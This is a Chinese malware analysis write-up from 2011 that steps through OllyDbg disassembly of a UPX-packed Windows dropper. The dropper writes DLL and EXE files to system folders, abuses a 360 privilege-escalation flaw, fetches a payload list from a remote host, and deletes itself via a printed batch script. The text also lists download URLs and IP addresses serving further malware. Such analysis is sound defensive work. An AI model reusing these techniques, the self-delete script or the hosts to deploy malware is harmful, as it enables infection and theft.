【病毒名称】: Packed.Win32.PePatch.lx[卡巴给的名字]
【分析时间】: 2011/03/14
【危害等级】: 中
【文章作者】: DeathMemory
【个人主页】: http://hi.baidu.com/deathmemory_dm
【软件大小】: 37.680 KB
【加壳方式】: UPX 修改壳
【使用工具】: OllyICE、PEID
【操作平台】: XPsp3
【作者声明】: 因为病毒变种或病毒配置等其它原因,此分析不能说明所有 PePatch 病毒的行为
【病毒样本】: 为了避免杀软的报警干扰,我把文件头的MZ改成了DM,文件名后缀直接改为了RAR。请想要测试的朋友自行修改回来。下载见附件。
=================================================================
病毒行为分析:
用PEID载入病毒程序,无法正确识别语言或加壳类型。
查看EP段的时候,发现有UPX0和UPX1 两个节,看起来应该是加了UPX壳吧,而且把加过壳的程序修改了,因此PEID没有正确识别出来。
不过没关系,反正UPX壳又不是骨肉相连的,程序运行后,代码会被还原回来。
我先用RegSnap对比了一下病毒运行前后,系统文件被修改的情况。对病毒的行为有了个大体的认识。
知道它大致在某处生成了一些文件和注册表信息(这里没有注册表操作信息)。
OD载入程序后,一开始就被断在了retn 处……这……这果然是没有脱壳的后果吗,而且还是被修改后的壳。
起初我还以为是病毒程序做了反调试,于是在这上面费了不少时间,后来按下F9,发现病毒可以正常运行,而不是反调试的退出。
但是断下的地方是 retn, 而且是在 ntdll 领空,如何才能返回到病毒程序的领空呢?
用 Ctrl+F9 显然太慢。我想既然病毒要生成新文件,那八成会用到CreateFile函数吧。
直接在CreateFile函数上下断: bp CreateFileA
果然断下来了,按Ctrl+F9 返回到调用处后就是病毒程序领空了。
当我设断的时候,OD提示说“您将在代码范围外设置断点……”
我估计是因为壳的原因,所以OD认为这里的代码不是在CS段里?
===>>
来到程序领空后,代码就一目了然了。
004022C0 81EC E4040000 SUB ESP,4E4
004022C6 A1 00404000 MOV EAX,DWORD PTR DS:[404000]
004022CB 33C4 XOR EAX,ESP
004022CD 898424 E0040000 MOV DWORD PTR SS:[ESP+4E0],EAX
004022D4 FF05 00504000 INC DWORD PTR DS:[405000]
004022DA 90 NOP
004022DB 90 NOP
004022DC 33C0 XOR EAX,EAX
004022DE 90 NOP
004022DF 90 NOP
004022E0 33C0 XOR EAX,EAX
004022E2 68 03010000 PUSH 103
004022E7 8D8424 D4000000 LEA EAX,DWORD PTR SS:[ESP+D4]
004022EE 50 PUSH EAX
004022EF FF15 18304000 CALL DWORD PTR DS:[403018] ; kernel32.GetSystemDirectoryA
004022F5 90 NOP
004022F6 90 NOP
发现 GetSystemDirectoryA 离程序入口比较近,以后就用 bp GetSystemDirectoryA 断这个函数吧。
继续向下分析
调用 GetSystemDirectoryA 获取系统目录
调用 GetTempPathA 获取系统临时文件夹目录
查找名为 65 资源, 并获取资源大小,然后加载资源
...
00402430 33C0 XOR EAX,EAX
00402432 68 EC304000 PUSH 复件_(2).004030EC ; CYCS
00402437 6A 65 PUSH 65
00402439 6A 00 PUSH 0
0040243B FF15 60304000 CALL DWORD PTR DS:[403060] ; kernel32.FindResourceA
00402441 8BF0 MOV ESI,EAX
00402443 56 PUSH ESI
00402444 6A 00 PUSH 0
00402446 FF15 10304000 CALL DWORD PTR DS:[403010] ; kernel32.SizeofResource
0040244C 56 PUSH ESI
0040244D 6A 00 PUSH 0
0040244F 8BF8 MOV EDI,EAX
00402451 FF15 58304000 CALL DWORD PTR DS:[403058] ; kernel32.LoadResource
获取 imm32.dll 句柄
00402457 68 84304000 PUSH 复件_(2).00403084 ; imm32.dll
0040245C 8BD8 MOV EBX,EAX
0040245E FF15 38304000 CALL DWORD PTR DS:[403038] ; kernel32.GetModuleHandleA
...
00402471 68 00100000 PUSH 1000 ; PAGE_READWRITE
00402476 8D47 01 LEA EAX,DWORD PTR DS:[EDI+1] ; MEM_COMMIT
00402479 50 PUSH EAX ; A001;40961.
0040247A 6A 00 PUSH 0 ; NULL
0040247C FF15 20304000 CALL DWORD PTR DS:[403020] ; kernel32.VirtualAlloc
;MEM_COMMIT 在内存或者指定的磁盘页文件(虚拟内存文件)中分配一物理存储区域 函数初始化这个区域为0
接下来获取当前进程句柄,并向里写入数据
打开"C:\WINDOWS\system32\lqcyc52.cyc"写入病毒体
004024BE 68 00000040 PUSH 40000000
004024C3 8D9424 F8010000 LEA EDX,DWORD PTR SS:[ESP+1F8]
004024CA 66:891E MOV WORD PTR DS:[ESI],BX
004024CD 52 PUSH EDX ;"C:\WINDOWS\system32\lqcyc52.cyc"
004024CE 8946 02 MOV DWORD PTR DS:[ESI+2],EAX
004024D1 FF15 64304000 CALL DWORD PTR DS:[403064] ; kernel32.CreateFileA
写入后关闭句柄,并用LoadLibraryA 以动态链接库的方式载入刚才生成的文件"C:\WINDOWS\system32\lqcyc52.cyc"
并且获取函数 init() 的地址
004024D7 6A 00 PUSH 0
004024D9 8BD8 MOV EBX,EAX
004024DB 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]
004024DF 50 PUSH EAX
004024E0 57 PUSH EDI
004024E1 56 PUSH ESI
004024E2 53 PUSH EBX
004024E3 FF15 08304000 CALL DWORD PTR DS:[403008] ; kernel32.WriteFile
004024E9 53 PUSH EBX
004024EA FF15 40304000 CALL DWORD PTR DS:[403040] ; kernel32.CloseHandle
004024F0 8D8C24 E0010000 LEA ECX,DWORD PTR SS:[ESP+1E0]
004024F7 51 PUSH ECX
004024F8 FF15 2C304000 CALL DWORD PTR DS:[40302C] ; kernel32.LoadLibraryA
004024FE 68 20314000 PUSH 复件_(2).00403120 ; init
00402503 50 PUSH EAX
00402504 FF15 1C304000 CALL DWORD PTR DS:[40301C] ; kernel32.GetProcAddress 获取 init() 函数地址
调用CopyFileA 拷贝"C:\WINDOWS\system32\lqcyc52.cyc" 到"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\setupapi.dll"临时文件
;0012FAC8 0012FCB4 |ExistingFileName = "C:\WINDOWS\system32\lqcyc52.cyc"
;0012FACC 0012FAE8 |NewFileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\setupapi.dll"
;0012FAD0 00000000 \FailIfExists = FALSE
之后调用 init() 函数, 会提示未找到 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\360tray.exe"
0040250A 6A 00 PUSH 0
0040250C 8D5424 18 LEA EDX,DWORD PTR SS:[ESP+18]
00402510 8BF0 MOV ESI,EAX
00402512 52 PUSH EDX
00402513 8D8424 E8010000 LEA EAX,DWORD PTR SS:[ESP+1E8]
0040251A 50 PUSH EAX
0040251B FF15 24304000 CALL DWORD PTR DS:[403024] ; kernel32.CopyFileA
00402521 FFD6 CALL ESI ; 调用 init() 函数
我首先想到的是,这个病毒可能是利用当时360本地提权漏洞的,由于我的虚拟机没有安装360安全卫士,所以病毒程序throw出了一条错误。
这种明显的暴露,没有做容错处理,也是病毒设计的不完善的地方。
init() 函数里面是怎么执行的我们先不管,继续向下。
函数调用后会Sleep 2000ms
之后紧跟着两个Call,
这两个Call也先不跟进去,先把程序的流程走完。
之后就是程序的退出了。
先猜测一下这两个Call的作用,程序跟到这里还有什么功能没有实现呢?
===猜测===
只有下载运行病毒和程序的自删除了。init() 这个函数猜测大体是用来提权的
那么第一个Call应该是下载运行其它病毒
第二个Call应该是自删除了
我们先这么猜着 =,= !
==========
好,我们现在再回过头来解决前面剩下的疑问.
先去init() 函数里面看看,是实现的什么功能
上来就是一个大跳
100010A0 >- E9 DD910000 JMP lqcyc52.1000A282
下面一个Call 是360 利用函数
1000BE61 E8 4DF2FFFF CALL lqcyc52.1000B0B3 ; 360 利用函数
里面有各种跳=,= ! 最终目的就是利用360提权的, 对360本地提权漏洞网上已经有公布利用代码和原理了,这里就不罗嗦了.
1000BDB2 E8 37D1FFFF CALL lqcyc52.10008EEE
360本地提权漏洞主要是用来写注册表操作的.我这里没有安装360所以注册表操作部分~~就省略了~~~
跟到第一个Call中
首先获取了系统目录 "C:\WINDOWS", 加载资源 66 ,写入当前进程内存空间,和上面的代码一样。
生成"C:\WINDOWS\systemdebug.exe"向里面写入数据.
004021C0 68 00000040 PUSH 40000000
004021C5 66:891E MOV WORD PTR DS:[ESI],BX
004021C8 68 58444000 PUSH 复件_(2).00404458 ; C:\WINDOWS\systemdebug.exe
004021CD 8946 02 MOV DWORD PTR DS:[ESI+2],EAX
004021D0 FF15 64304000 CALL DWORD PTR DS:[403064] ; kernel32.CreateFileA
打开自身,将文件指针移到指定位置,并从里面循环读取读取配置信息
;ASCII "OOOOOOhttp://www.nhiry.com/1.txt|C:\WINDOWS\boot.ini"
最后用隐藏方式运行"C:\WINDOWS\systemdebug.exe" 执行其它病毒的下载运行模块
00402267 8038 00 CMP BYTE PTR DS:[EAX],0
0040226A 74 03 JE SHORT 复件_(2).0040226F
0040226C 8030 12 XOR BYTE PTR DS:[EAX],12
0040226F 40 INC EAX
00402270 ^ E2 F5 LOOPD SHORT 复件_(2).00402267 ;循环读取字符
...
00402293 6A 00 PUSH 0
00402295 68 58444000 PUSH 复件_(2).00404458 ; C:\WINDOWS\systemdebug.exe
0040229A FF15 3C304000 CALL DWORD PTR DS:[40303C] ; kernel32.WinExec
接下来的第二个Call
获取当前进程的文件名。
00402020 56 PUSH ESI
00402021 68 04010000 PUSH 104
00402026 8D9424 D8000000 LEA EDX,DWORD PTR SS:[ESP+D8]
0040202D 52 PUSH EDX
0040202E 6A 00 PUSH 0
00402030 66:894424 10 MOV WORD PTR SS:[ESP+10],AX
00402035 884C24 12 MOV BYTE PTR SS:[ESP+12],CL
00402039 FF15 38304000 CALL DWORD PTR DS:[403038] ; kernel32.GetModuleHandleA
0040203F 50 PUSH EAX
00402040 FF15 34304000 CALL DWORD PTR DS:[403034] ; kernel32.GetModuleFileNameA
生成自删除的批处理命令字符串
;0012F8E0 0012F900 |s = 0012F900
;0012F8E4 00403098 |Format = ":try
;del "%s""
; if exist "%s" goto try
; del %s"
;0012F8E8 0012F9C8 |<%s> = "E:\User\Desktop\复件 (2) 我的最新照片.exe"
;0012F8EC 0012F9C8 |<%s> = "E:\User\Desktop\复件 (2) 我的最新照片.exe"
;0012F8F0 0012F8F8 \<%s> = "%0"
;0012F8F4 100010A0 lqcyc52.init
00402046 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
0040204A 50 PUSH EAX
0040204B 8D8C24 D8000000 LEA ECX,DWORD PTR SS:[ESP+D8]
00402052 51 PUSH ECX
00402053 8BD1 MOV EDX,ECX
00402055 52 PUSH EDX
00402056 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]
0040205A 68 98304000 PUSH 复件_(2).00403098 ; :try\r\ndel "%s""\r\n if exist "%s" goto try\r\n del %s
0040205F 50 PUSH EAX
00402060 FF15 74304000 CALL DWORD PTR DS:[403074] ; USER32.wsprintfA
然后生成 c:\test.bat,将字符串写入。关闭文件后运行批处理实现自删除。
004020A7 FF15 08304000 CALL DWORD PTR DS:[403008] ; kernel32.WriteFile
004020AD 56 PUSH ESI
004020AE FF15 40304000 CALL DWORD PTR DS:[403040] ; kernel32.CloseHandle
004020B4 6A 00 PUSH 0
004020B6 68 CC304000 PUSH 复件_(2).004030CC ; c:\test.bat
004020BB FF15 3C304000 CALL DWORD PTR DS:[40303C] ; kernel32.WinExec
程序的思路大致都是如此,分析后证明我们之前的猜想是正确的。
此病毒的分析就到此为止了,了解病毒的动作以后,相信手工清除也不是什么难事了吧。
文中省略的地方,有兴趣的朋友自行研究喽……
不足和错误之处还请批评指证~~
=================================================================
病毒创建文件列表:
C:\WINDOWS\systemdebug.exe
C:\WINDOWS\system32\lqcyc52.cyc
c:\test.bat
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\setupapi.dll
=================================================================
超级字串参考:
地址 反汇编 文本字串
0040205A PUSH 复件_(2).00403098 :try\r\ndel "%s""\r\n if exist "%s" goto try\r\n del %s
0040207B PUSH 复件_(2).004030CC c:\test.bat\systemdebug.exe
004020B6 PUSH 复件_(2).004030CC c:\test.bat\systemdebug.exe
00402100 PUSH 复件_(2).00404458 C:\WINDOWS\systemdebug.exe
0040210B MOV EAX,复件_(2).00404458 C:\WINDOWS\systemdebug.exe
0040214C PUSH 复件_(2).004030EC CYCS
004021C8 PUSH 复件_(2).00404458 C:\WINDOWS\systemdebug.exe
004021D6 PUSH 0 (Initial CPU selection)
00402295 PUSH 复件_(2).00404458 C:\WINDOWS\systemdebug.exe
00402432 PUSH 复件_(2).004030EC CYCS
00402457 PUSH 复件_(2).00403084 imm32.dll
004024FE PUSH 复件_(2).00403120 init
0040A841 MOV DWORD PTR SS:[ESP+28],10002190 Kingsoft
0040A991 MOV DWORD PTR SS:[ESP+40],10002188 Rav\
0040AA2E MOV DWORD PTR SS:[ESP+20],10002168 360\systemdebug.exe
0040AE6B MOV DWORD PTR SS:[ESP+8],10002188 Rav\
0040B75D MOV DWORD PTR SS:[ESP+4],100021A8 Kaspersky
0012F9B8 00940000 ASCII "OOOOOOhttp://www.nhiry.com/1.txt|C:\WINDOWS\boot.ini"
=================================================================
在C 盘生成 test.bat 批处理,内容如下:
=======
:try
del "E:\User\Desktop\复件 (2) 我的最新照片.exe""
if exist "E:\User\Desktop\复件 (2) 我的最新照片.exe" goto try
del %0
=======
利用批处理实现自删除的功能 !
=================================================================
病毒访问网络 http://www.nhiry.com/1.txt 内容如下:
http://www.sxett.com/1.exe
http://49.247.254.45/1.exe
http://49.247.254.38/qazwsx/3.exe
http://49.247.254.30/2/7.exe
http://49.247.254.38/qazwsx/wmgj1.exe
http://49.247.254.38/qazwsx/lszt.exe
http://49.247.254.38/qazwsx/dj.exe
http://49.247.254.38/qazwsx/mhxy1.exe
http://49.247.254.38/qazwsx/mhzx1.exe
http://49.247.254.38/qazwsx/qqsg1.exe
http://49.247.254.38/qazwsx/dt1.exe
http://49.247.254.38/qazwsx/wl1.exe
http://49.247.254.38/qazwsx/wd1.exe
http://49.247.254.38/qazwsx/wow1.exe
http://49.247.254.38/qazwsx/zx2.exe
http://49.247.254.38/qazwsx/jxsj1.exe
http://49.247.254.38/qazwsx/qqhx1.exe
http://49.247.254.38/qazwsx/lzg1.exe
http://49.247.254.38/qazwsx/dh2.exe
http://49.247.254.38/qazwsx/qqhxsj1.exe
http://49.247.254.38/qazwsx/tl1.exe
http://49.247.254.38/qazwsx/cqsj1.exe
http://49.247.254.38/qazwsx/ztzs1.exe
http://49.247.254.38/qazwsx/tx21.exe
http://49.247.254.38/qazwsx/smdl1.exe
http://49.247.254.38/qazwsx/jx31.exe
http://49.247.254.38/qazwsx/qqxy1.exe
http://49.247.254.38/qazwsx/sg21.exe
http://49.247.254.38/qazwsx/sm1.exe
http://49.247.254.38/qazwsx/cs1.exe
http://49.247.254.38/qazwsx/dmlq1.exe
http://49.247.254.38/qazwsx/qqzyhx1.exe
http://49.247.254.30/2/8.exe
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课